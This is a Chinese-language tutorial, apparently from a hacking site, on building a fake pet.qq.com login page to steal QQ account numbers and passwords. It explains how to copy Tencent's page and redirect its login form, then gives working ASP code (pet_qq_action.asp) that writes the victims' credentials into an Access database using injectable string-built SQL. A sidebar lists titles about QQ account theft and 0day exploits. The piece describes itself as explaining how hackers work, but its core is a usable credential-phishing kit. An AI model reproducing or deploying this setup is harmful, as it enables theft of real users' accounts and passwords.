|
[组图]构造一个简单的盗取QQ密码网络钓鱼工程
网络钓鱼(Phishing),顾名思义,就是在网络上构造一定的诱饵,利用被害人的某些欲望,构造一些貌似值得追寻获得的东西,引诱被害人陷入hacker事先设置好的陷阱里,并通过一定的手段获得被害人的相关敏感信息。
攻击者利用欺骗性的电子邮件和伪造的 Web 站点来进行网络诈骗活动,受骗者往往会泄露自己的私人资料,如信用卡号、银行卡账户、身份证号等内容。诈骗者通常会将自己伪装成网络银行、在线零售商和信用卡公司等可信的品牌,骗取用户的私人信息。
今天,我们通过利用asp和access数据库构造一个简单的网络钓鱼工程,来详细了解hacker是如何通过相关的手段骗取被害人信息的。
首先,我们选定将要伪装的目标,今天我们以腾讯宠物官方网站pet.qq.com为目标(前些时候那个假冒的中国工商银行官方网站和本文的骗取手段有一定的相同之处),通过构造一个假的宠物官方网站,通过骗去用户登陆来获得被害人的QQ号码和密码信息的简单工程。
打开http://pet.qq.com,打开其中有一个领取QQ宠物的页面,我们在浏览器文件菜单下的另存为将它的整个页面保存下来,命名为index.htm,这样,在桌面上打开它,页面除了地址之外,其他的跟腾讯的官网大同小异,当时这样一个页面还不能够骗取用户的信息。
接下来我们利用asp和数据库实现当用户输入号码和密码的时候,把相关的信息保存在我们的网站上。用记事本打开index.htm,找到用户登陆的表单并将action修改为pet_qq_action.asp,即
并修改相关的表单名称使之与我们后面的数据库、pet_qq_action.asp里面的互对应,下来我们写pet_qq_action.asp代码,这个我就不详细说了,
pet_qq_action.asp的代码如下:
<%
dim db,strcon,qq,pass,rs,strSql //定义变量
strcon="dbq="& server.mappath("数据库名称.mdb") &"; driver= {microsoft access driver (*.mdb)}"
Set db=Server.createobject("ADODB.connection")//与数据库连接
db.open strcon//打开数据库
qq=Request("qqNumber")//获取qqNumber(QQ号码)内容
pass=Request("qqpassword")//获取qqpassword(密码)内容
strSql="INSERT INTO pass(name, pass) VALUES('"& qq &"','"& pass &"')"
db.Execute(strSql) //将获取的信息插入数据库
%>
//以上代码就简单实现了当用户输入号码和密码的时候,利用pet_qq_action.asp将信息保存到我们指定的数据库。
| 如何绕过《QQ医生》的查杀 | 12-26 |
| QQ盗号软件后门分析与反击 | 10-26 |
| 防止QQ密码被破解 让你安心上QQ | 10-15 |
| 你的QQ号和Q币是如何被盗的! | 10-15 |
| QQ也来玩0day漏洞(杂志版带执行) | 09-01 |
| QQ积分游戏漏洞!80个积分就能做 | 08-27 |
| QQ 0day漏洞工具利用 | 08-17 |
| QQ所有文件和目录详细分析 | 07-02 |
| 选个好密码 黑客窃取QQ常用密码排 | 07-02 |
| 腾讯QQ聊天窗口漏洞安全测试报告 | 06-18 |
| 如何准确识别QQ盗号两大陷阱 | 06-05 |
| 如何禁止他人上QQ!! | 06-02 |
您现在的位置: